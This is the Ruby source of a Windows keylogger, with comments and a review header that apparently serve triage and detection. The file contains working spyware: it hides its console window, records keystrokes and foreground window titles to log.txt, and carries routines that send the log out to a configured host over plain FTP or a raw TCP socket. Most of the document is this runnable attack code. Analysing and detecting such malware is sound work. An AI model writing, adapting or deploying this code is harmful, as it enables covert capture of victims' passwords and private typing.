# Ruby Keylogger.
# If uncommented, sending over sockets can be enabled.
#
# Pending for later versions:
# - GUI for the client
# - Fix symbols, backspace and that sort of thing...xD
#
#
# Coded by pRotos: protos.nu@gmail.com
#
# Review summary (what the code below visibly does, for triage and detection):
# - Windows only: every capability goes through Win32API calls into kernel32 / user32.
# - Hides its own console window (GetConsoleWindow + ShowWindow with 0).
# - Polls GetAsyncKeyState in a loop and appends to 'log.txt', opened by relative
#   path, i.e. in the process's current working directory.
# - Records foreground-window changes (GetForegroundWindow / GetWindowText) in the
#   same file as "[<title>]" lines; a "[borra]" marker is written for key code 8.
# - Contains two outbound paths for the log: Net::FTP upload and a raw TCPSocket.
# Observable artifacts: a script-interpreter process with a hidden console, repeated
# open/append/close on log.txt, and the API names listed above.
class Keylogger
  require 'Win32API'

  # Stores the socket endpoint (host, port) and the FTP endpoint and credentials
  # (ftphost, ftpuser, ftppass) in instance variables.
  # Every parameter defaults to the Symbol :caca.
  def intialize(host=:caca, port=:caca, ftphost=:caca, ftpuser=:caca, ftppass=:caca)
    @host = host
    @port = port
    @ftphost = ftphost
    @ftpuser = ftpuser
    @ftppass = ftppass
  end

  # Hides the console window of the current process.
  # GetConsoleWindow returns the console's window handle; ShowWindow is then called
  # on that handle with command 0 (SW_HIDE), so nothing is shown to the user.
  def esconder
    win = Win32API.new('kernel32' , 'GetConsoleWindow' , [] , 'L').call
    Win32API.new( 'user32' , 'ShowWindow' , ['p' , 'i'] , 'i' ).call(win, 0)
  end

  # Key-state polling loop; never returns.
  # Builds a table mapping the one-character string for each code 32..128 to that
  # code, then loops forever over the table with no sleep between passes.
  # Each hit opens log.txt in append mode, writes, and closes it again.
  def key
    teclas = Hash.new
    (32 .. 128).each { |x| teclas[x.chr] = x }
    pulsacion = Win32API.new('user32', 'GetAsyncKeyState', ['i'], 'i')
    while 1
      teclas.each { |x, y|
        # Code 13 (Enter): low bit of the result set -> write a newline.
        # This check runs once per table entry, not once per outer pass.
        if pulsacion.call(13) & 0x01 == 1
          f = File.open('log.txt', 'a')
          f.print "\n"
          f.close
        end
        # Code 8 (Backspace): write the literal marker "[borra]".
        if pulsacion.call(8) & 0x01 == 1
          f = File.open('log.txt', 'a')
          f.print "[borra]"
          f.close
        end
        # Table entry itself: write the table key x when code y reports the low bit.
        if pulsacion.call(y) & 0x01 == 1
          f = File.open('log.txt', 'a')
          f.print x
          f.close
        end
      }
    end
  end

  # Foreground-window tracking loop; never returns.
  # Samples the foreground window handle, sleeps one second, samples again, and
  # when the two differ appends the new window's title to log.txt as "[title]\n".
  def ventana
    while 1
      a = Win32API.new('user32', 'GetForegroundWindow', [], 'N').Call()
      sleep 1
      b = Win32API.new('user32', 'GetForegroundWindow', [], 'N').Call()
      if a != b
        f = File.open('log.txt', 'a')
        # Buffer handed to GetWindowText together with the length 256.
        title = ' '*256
        win = Win32API.new('user32', 'GetWindowText', ['L', 'P', 'I'], 'I').Call(b, title, 256)
        # Removes every run of spaces, so spaces inside the title are dropped too,
        # not only the unused padding.
        title = title.gsub( / +/, '')
        f.print "[#{title}]\n"
        f.close
      end
    end
  end

  # Uploads log.txt to @ftphost with Net::FTP, logging in as @ftpuser / @ftppass.
  # No TLS options are passed, so this is plain FTP: credentials and file contents
  # would be readable on the wire. The connection is not closed here.
  # Not called from #run or from the top-level script in this file.
  def ftp
    require 'net/ftp'
    ftp = Net::FTP.new(@ftphost)
    ftp.login(@ftpuser, @ftppass)
    ftp.put('log.txt')
  end

  # Streams log.txt line by line over a new TCP connection to @host:@port.
  # Returns false without connecting when @host equals the String 'caca'.
  # Neither the file handle nor the socket is closed in this method.
  # NOTE(review): this definition shadows Object#send for Keylogger instances.
  def send
    if @host != 'caca'
      require 'socket'
      f = File.open('log.txt', 'r+')
      sock = TCPSocket.new(@host, @port)
      f.each_line do |line|
        sock.puts line
      end
    else
      return false
    end
  end

  # Reachability probe for @host:@port.
  # Returns true when a TCP connection opens, false when TCPSocket.new raises
  # (bare rescue, so any StandardError) or when @host equals the String 'caca'.
  # The probe socket is not closed.
  def conn
    if @host != 'caca'
      require 'socket'
      begin
        sock = TCPSocket.new(@host, @port)
        return true
      rescue
        return false
      end
    else
      return false
    end
  end

  # Starts three threads and joins them: the key poller, the window tracker, and a
  # sender that keeps calling #send for as long as #conn returns a truthy value.
  # Each sender pass opens one connection in #conn and a second one in #send, so
  # on the network it appears as repeated connections to the same host and port.
  def run
    a = Thread.new { key }
    b = Thread.new { ventana }
    c = Thread.new {
      while res = conn
        if res == true
          send
        end
      end
    }
    a.join
    b.join
    c.join
  end
end

# Script entry point: create the object with no arguments, hide the console
# window, then start the threads. Runs as soon as the file is loaded.
key = Keylogger.new
key.esconder
key.run